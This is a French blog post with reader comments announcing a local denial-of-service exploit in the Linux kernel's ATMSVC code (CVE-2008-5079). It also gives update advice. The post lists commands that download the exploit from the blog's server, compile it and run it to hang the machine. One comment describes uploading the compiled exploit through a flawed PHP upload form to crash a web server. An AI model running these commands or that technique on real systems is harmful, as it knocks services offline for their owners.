Linux : ATMSVC Local Denial of Service Exploit
Une faille de sécurité a été découverte pour les versions du noyau Linux inférieures ou égales à la 2.6.27.8. L'exploit permet à un simple utilisateur d'une machine Linux quelconque de créer un déni de service local (kernel infinite loop). La seule solution pour contrer ce type d'attaque est de mettre à jour votre système.
Exemple d'utilisation de l'expoit :
wget www.tux-planet.fr/public/hack/exploits/kernel/atmsvc-local-denial-of-service-exploit.c
gcc -o atmsvc-local-denial-of-service-exploit atmsvc-local-denial-of-service-exploit.c
./atmsvc-local-denial-of-service-exploit
Ceci provoquera le plantage total de la machine Linux, obligeant l'administrateur à effectuer un reboot hardware.
Pour mettre à jour votre système :
- distribution à base de debian : sudo aptitude update && sudo aptitude upgrade
- distribution à base de rpm : yum update
17 Commentaires pour "Linux : ATMSVC Local Denial of Service Exploit"
Flux des commentaires de cet article Ajouter un commentaireC'est nul ... ça compile pas chez moi ^^
/usr/include/linux/atm.h:210: erreur: expected specifier-qualifier-list before «uint32_t»
En attendant, je met à jour mon noyau
La bonne question que je me pose: les systèmes mac osx étant sur une base unix, sont il touchés ?
J'ai une 404 not found sur ton fichier, c'etait un exemple ou tu l'as retiré ? j'aimerais testé en fait
@theClimber : j'ai testé sur une Fedora et une Ubuntu pas à jour. J'ai pas eu de problème de compilation. Il doit te manquer des paquets liés au langage c ou aux compilateurs (gcc). Ou peut-être le paquet linux-header ...
@clawfire : pas d'erreur 404 chez moi. L'url donnée est valide. Sinon je sais pas trop pour Mac. En générale, les failles de Linux ne concernent pas cette OS.
Je viens de tester (j'avais oublié le c après le . :D) et ca ne compile même pas, alors l'exécution du pense bien
merci d'avoir fait planter mon macbook!!! ^^
kernel mis à jour, merci pour l'info
Au passage, je précise : c'est surtout dans le cadre de serveurs web que ce genre d'attaque est à prendre au sérieux. Car en combinant cet exploit à un autre, ça peut faire des ravages.
Exemple : un hackeur exploit une faille php ou apache. Il se retrouve ensuite sur la machine avec un shell en tant que user "Apache". Il peut ensuite faire un déni de service sans problème via cet méthode.
Si j'ai bien compris il faut déjà être connecté sur la machine pour planter le système ?
@inalgu : tu as un un kernel panic ? moi ça compile même pas ...
bonsoir, je tiens quand même à signaler que cette mise à jour posera des problèmes pour les utilisateurs de vmwareworkstation...
J'ai dû faire un downgrade du noyaux pour l'utiliser. D'autres logiciels auraient-ils le même soucis avec un upgrade?
@clawfire : tu sembles confondre Linux et Unix. Mac OS X et Linux sont des systèmes Unix mais les failles de Linux restent chez Linux.
#define uint32_t unsigned int
Ça compilera mieux.
j'ai comme un petit problème là, après mis a jour du kernel j'arrive toujours a faire planter le système, c'est pas très normal, la dernière version du noyau c'est bien la 2.6.27.7-134?
@inalgu : The latest stable version of the Linux kernel is: 2.6.27.8 tu peux retrouver ça sur http://www.kernel.org
@tetageek : oui et non. Ce genre de technique peut-être utilisé via php, sans shell, donc sans accès sur le machine. Un hackeur peut uploader l'exploit déjà compilé (via un formulaire d'upload mal conçu) et le lancer via la page php :
@inalgnu @mystery_inter : la faille est peut-être pas encore corrigé chez Fedora. J'ai été rapide sur la publication de cet exploit.
Note that this is fixed in Fedora 10 kernel 2.6.27.8-143 as well.
You can find out more at:
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-5079
@Eugene Teo : ok, thank you for this information.
Heu, chez ovh quand on fait un aptitude update, upgrade et bien la correction du noyau n'est pas déployé. (debian inside
)